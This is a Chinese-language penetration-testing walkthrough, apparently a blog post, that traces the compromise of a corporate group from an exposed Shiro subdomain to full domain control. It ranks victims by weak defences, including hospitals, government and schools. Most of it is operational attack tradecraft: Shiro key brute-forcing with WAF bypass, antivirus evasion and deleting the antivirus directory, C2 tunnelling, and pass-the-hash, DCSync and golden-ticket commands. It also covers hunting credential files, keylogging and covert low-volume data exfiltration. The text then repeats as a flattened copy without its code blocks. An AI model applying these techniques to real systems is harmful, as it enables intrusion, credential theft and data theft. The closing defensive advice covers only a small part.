某集团子域安全缺陷引发的全域沦陷
字数 2359 2025-08-27 12:33:22

某大型集团渗透测试实战全流程解析

一、目标评估与优先级划分

在渗透测试初期,需要对目标资产进行科学分类,建立攻击优先级:

第一梯度(高优先级)

  • 私企、医疗、科技园区、工厂
  • 特点:业务体量大、互联网暴露面多

第二梯度(中优先级)

  • 政府单位(人社厅/局、教育厅/局)
  • 学校、国企
  • 特点:防护等级中等,安全意识薄弱,监控力度昼夜差异大

第三梯度(低优先级)

  • 电力、金融系统
  • 特点:安全性高、暴露面少,安全规范严格

二、信息收集方法论

1. 资产测绘三维度

  1. 企业关联查询

    • 使用爱企查查询控股子公司
    • 分析招标文件和官网信息获取第三方供应商
    • 通过ICP备案查询注册域名、小程序和APP资产

  2. 自动化收集工具链

    • 子域名扫描(OneForAll、subfinder)
    • DNS查询(dig、nslookup)
    • 端口扫描(masscan、nmap)
    • 指纹识别(Wappalyzer、EHole)
    • 漏洞测试(Nuclei、Xray)

  3. 业务针对性收集

    • 针对制造业重点关注:出售平台、制造平台
    • 根据主要业务进行旁站信息收集

2. 关键资产定位技巧

网络空间测绘平台使用

  • Hunter:备案内容收录全面,搜索语法:domain="xxx.com"
  • Fofa:数据量大但效率下降
  • 360Quake:备案资产收集顶尖
  • 零零信安:移动资产、小程序搜索突出
  • 微步情报社区:端口、whois信息、子域名收集顶级

高级搜索语法

# title关键字
domain="xxx.com" && (web.title="管理" || web.title="后台" || web.title="登录" || web.title="邮件" || web.title="教务" || web.title="注册" || web.title="访客")

# body关键字
domain="xxx.com" && (web.body="管理" || web.body="后台" || web.body="登录" || web.body="用户名" || web.body="密码" || web.body="验证码" || web.body="系统" || web.body="账号" || web.body="忘记密码")

三、漏洞利用实战:Shiro反序列化

1. 攻击准备

  1. 指纹识别

    • 识别Shiro框架特征(Cookie中的rememberMe字段)

  2. 密钥爆破

    • 推荐工具:ShiroAttack2
    • 关键改进:添加WAF绕过功能(随机延迟、请求头伪造、IP轮换)

  3. 规避检测

    • 避免使用一键化工具
    • 采用低频率、随机化请求模式
    • 建议对工具进行二次开发

2. 后渗透操作

  1. 敏感信息收集

    dir /s/b *.conf  # 快速定位配置文件

  2. 自动化信息收集脚本

    • 使用Go编写轻量级敏感信息扫描工具
    • 关键扫描字段: 
      jdbc, redis, mysql, pgsql, oracle, oss.accessKey, 
oss.secretKey, password, username, mail, token, 
datasource, accessKeyId, mssql, sqlserver

  3. 密码规律分析

    • 企业常用密码模式:公司名+年份+特殊符号(如wanhai2025@!)
    • 内网密码往往存在前几位重复

四、内网渗透策略

1. 初始立足点加固

  1. 信息收集优先级

    • 系统信息(ipconfig /all, systeminfo)
    • 用户会话(query user, net session)
    • 网络拓扑(arp -a, netstat -ano)
    • 安全产品(tasklist /svc, Get-MpComputerStatus)

  2. 规避杀软(ESET企业版)

    • 免杀技术:
      • 内存加载(Donut、sRDI)
      • 进程注入(Process Hollowing)
      • 白名单劫持(COM劫持、DLL侧加载)
    • 应急方案:使用火绒强碎粉碎杀软安装目录

  3. C2选择

    • 前期使用Vshell搭建内网隧道
    • 后期转Cobalt Strike利用插件优势
    • 推荐工具:Adaptixde、Havoc的beacon

2. 内网侦察

  1. 资产发现

    • 使用免杀版fscan(速率调低)
    • 网段探测工具:netspy
    • 扫描重点:RDP、数据库服务

  2. 横向移动路径

    • 优先获取主机权限而非Web权限
    • 建立跳板机避免入口点丢失

五、域渗透全流程

1. 域内信息收集

基础命令

ipconfig /all          # 查看DNS服务器(通常为域控)
systeminfo             # 获取域信息
net time /domain       # 探测域控主机名
net config workstation # 显示工作站域
whoami /all            # 查看用户权限和SID

用户与组枚举

net user /domain                  # 列出域用户
net user <username> /domain       # 查询指定用户
net group /domain                 # 列出域组
net group "Domain Admins" /domain # 枚举域管

高级收集

# SPN扫描
setspn -T <domain> -Q */*

# 使用PowerView收集
Get-ADObject -LDAPFilter "(servicePrincipalName=*)" -Properties servicePrincipalName
Get-DomainGPOUserLocalGroupMapping
Invoke-ACLScanner

2. 横向移动技术

  1. 凭证传递

    • Pass The Hash (PtH): 
      crackmapexec smb <targets> -u <user> -H <hash>
psexec.py -hashes :<hash> <user>@<target>
    • Pass The Ticket (PtT): 
      kerberos::ptt <ticket.kirbi>

  2. 远程执行

    • WMI: 
      wmic /node:<target> /user:<user> /password:<pass> process call create "cmd.exe /c ..."
    • WinRM: 
      Enter-PSSession -ComputerName <target> -Credential <cred>

  3. 计划任务

    schtasks /create /s <target> /ru <user> /rp <pass> /tn <name> /tr "cmd.exe /c ..." /sc once /st <time>
schtasks /run /s <target> /tn <name>

3. 跨域攻击

  1. 域信任发现

    nltest /domain_trusts

  2. DCSync攻击

    • 前提条件:需具备Administrators/Domain Admins/Enterprise Admins权限
    • 执行方法: 
      lsadump::dcsync /domain:<domain> /user:krbtgt

  3. 黄金票据制作

    • 所需信息:krbtgt的NTLM哈希、域SID
    • 使用mimikatz生成: 
      kerberos::golden /user:Administrator /domain:<domain> /sid:<SID> /krbtgt:<hash> /ptt

六、高级持久化与业务渗透

1. 组织架构分析

# OU结构分析
Get-ADOrganizationalUnit -Filter * | select Name, DistinguishedName

# 用户业务属性分析
Get-ADUser -Filter * -Properties DisplayName, Description, EmailAddress

# 计算机命名规则分析
Get-ADComputer -Filter * -Properties OperatingSystem, LastLogonDate

2. 业务目标定位策略

  1. 关键部门映射

    • 董事会/总经理办公室:战略决策文件
    • 财务中心:财务数据、资金流水
    • 研发部门:产品源码、专利文档
    • 人力行政:员工敏感信息

  2. 用户行为分析

    • 浏览器历史与书签分析
    • 邮件客户端数据挖掘
    • 云服务同步目录监控
    • 近期文档访问记录

3. 隐蔽渗透原则

  1. 业务拟态

    • 模拟正常用户访问模式
    • 遵循目标组织的工作时间规律
    • 使用业务相关文件名和内容

  2. 数据获取策略

    • 优先获取业务系统凭据而非直接下载数据
    • 通过业务系统正常功能导出数据
    • 采用低频、小批量数据外传

七、工具与资源推荐

  1. Shiro利用

  2. 域信息收集

    • Darksteel(规避流量检测)
    • PowerView(BloodHound组件)

  3. 免杀框架

    • Havoc(开源C2)
    • Adaptixde(商业级免杀)

  4. 横向移动

    • CrackMapExec(多协议横向)
    • Rubeus(Kerberos操作)

  5. 行为分析

    • PowerSploit的Get-Keystrokes
    • Nishang的Get-TimedScreenshot

八、防御建议

  1. Shiro防护

    • 升级到最新版本
    • 修改默认加密密钥
    • 添加WAF规则拦截反序列化攻击

  2. 域安全加固

    • 限制DCSync权限
    • 监控krbtgt账户变更
    • 启用LSA保护

  3. 内网监控

    • 建立基线网络行为模型
    • 监控异常SPN请求
    • 审计高权限账户的登录行为

  4. 终端防护

    • 应用白名单策略
    • 限制PowerShell执行权限
    • 监控异常进程注入行为

本教学文档完整还原了从外网突破到内网域控控制的全过程,重点突出了Shiro反序列化利用、内网横向移动、域渗透技术以及高级业务目标定位策略,可作为企业红队演练的实战参考。

某大型集团渗透测试实战全流程解析 一、目标评估与优先级划分 在渗透测试初期,需要对目标资产进行科学分类,建立攻击优先级: 第一梯度(高优先级) : 私企、医疗、科技园区、工厂 特点:业务体量大、互联网暴露面多 第二梯度(中优先级) : 政府单位(人社厅/局、教育厅/局) 学校、国企 特点:防护等级中等,安全意识薄弱,监控力度昼夜差异大 第三梯度(低优先级) : 电力、金融系统 特点:安全性高、暴露面少,安全规范严格 二、信息收集方法论 1. 资产测绘三维度 企业关联查询 : 使用爱企查查询控股子公司 分析招标文件和官网信息获取第三方供应商 通过ICP备案查询注册域名、小程序和APP资产 自动化收集工具链 : 子域名扫描(OneForAll、subfinder) DNS查询(dig、nslookup) 端口扫描(masscan、nmap) 指纹识别(Wappalyzer、EHole) 漏洞测试(Nuclei、Xray) 业务针对性收集 : 针对制造业重点关注:出售平台、制造平台 根据主要业务进行旁站信息收集 2. 关键资产定位技巧 网络空间测绘平台使用 : Hunter:备案内容收录全面,搜索语法: domain="xxx.com" Fofa:数据量大但效率下降 360Quake:备案资产收集顶尖 零零信安:移动资产、小程序搜索突出 微步情报社区:端口、whois信息、子域名收集顶级 高级搜索语法 : 三、漏洞利用实战:Shiro反序列化 1. 攻击准备 指纹识别 : 识别Shiro框架特征(Cookie中的rememberMe字段) 密钥爆破 : 推荐工具: ShiroAttack2 关键改进:添加WAF绕过功能(随机延迟、请求头伪造、IP轮换) 规避检测 : 避免使用一键化工具 采用低频率、随机化请求模式 建议对工具进行二次开发 2. 后渗透操作 敏感信息收集 : 自动化信息收集脚本 : 使用Go编写轻量级敏感信息扫描工具 关键扫描字段: 密码规律分析 : 企业常用密码模式:公司名+年份+特殊符号(如wanhai2025@ !) 内网密码往往存在前几位重复 四、内网渗透策略 1. 初始立足点加固 信息收集优先级 : 系统信息(ipconfig /all, systeminfo) 用户会话(query user, net session) 网络拓扑(arp -a, netstat -ano) 安全产品(tasklist /svc, Get-MpComputerStatus) 规避杀软(ESET企业版) : 免杀技术: 内存加载(Donut、sRDI) 进程注入(Process Hollowing) 白名单劫持(COM劫持、DLL侧加载) 应急方案:使用火绒强碎粉碎杀软安装目录 C2选择 : 前期使用Vshell搭建内网隧道 后期转Cobalt Strike利用插件优势 推荐工具:Adaptixde、Havoc的beacon 2. 内网侦察 资产发现 : 使用免杀版fscan(速率调低) 网段探测工具:netspy 扫描重点:RDP、数据库服务 横向移动路径 : 优先获取主机权限而非Web权限 建立跳板机避免入口点丢失 五、域渗透全流程 1. 域内信息收集 基础命令 : 用户与组枚举 : 高级收集 : 2. 横向移动技术 凭证传递 : Pass The Hash (PtH): Pass The Ticket (PtT): 远程执行 : WMI: WinRM: 计划任务 : 3. 跨域攻击 域信任发现 : DCSync攻击 : 前提条件:需具备Administrators/Domain Admins/Enterprise Admins权限 执行方法: 黄金票据制作 : 所需信息:krbtgt的NTLM哈希、域SID 使用mimikatz生成: 六、高级持久化与业务渗透 1. 组织架构分析 2. 业务目标定位策略 关键部门映射 : 董事会/总经理办公室:战略决策文件 财务中心:财务数据、资金流水 研发部门:产品源码、专利文档 人力行政:员工敏感信息 用户行为分析 : 浏览器历史与书签分析 邮件客户端数据挖掘 云服务同步目录监控 近期文档访问记录 3. 隐蔽渗透原则 业务拟态 : 模拟正常用户访问模式 遵循目标组织的工作时间规律 使用业务相关文件名和内容 数据获取策略 : 优先获取业务系统凭据而非直接下载数据 通过业务系统正常功能导出数据 采用低频、小批量数据外传 七、工具与资源推荐 Shiro利用 : ShiroAttack2 (推荐二次开发) 域信息收集 : Darksteel (规避流量检测) PowerView(BloodHound组件) 免杀框架 : Havoc(开源C2) Adaptixde(商业级免杀) 横向移动 : CrackMapExec(多协议横向) Rubeus(Kerberos操作) 行为分析 : PowerSploit的Get-Keystrokes Nishang的Get-TimedScreenshot 八、防御建议 Shiro防护 : 升级到最新版本 修改默认加密密钥 添加WAF规则拦截反序列化攻击 域安全加固 : 限制DCSync权限 监控krbtgt账户变更 启用LSA保护 内网监控 : 建立基线网络行为模型 监控异常SPN请求 审计高权限账户的登录行为 终端防护 : 应用白名单策略 限制PowerShell执行权限 监控异常进程注入行为 本教学文档完整还原了从外网突破到内网域控控制的全过程,重点突出了Shiro反序列化利用、内网横向移动、域渗透技术以及高级业务目标定位策略,可作为企业红队演练的实战参考。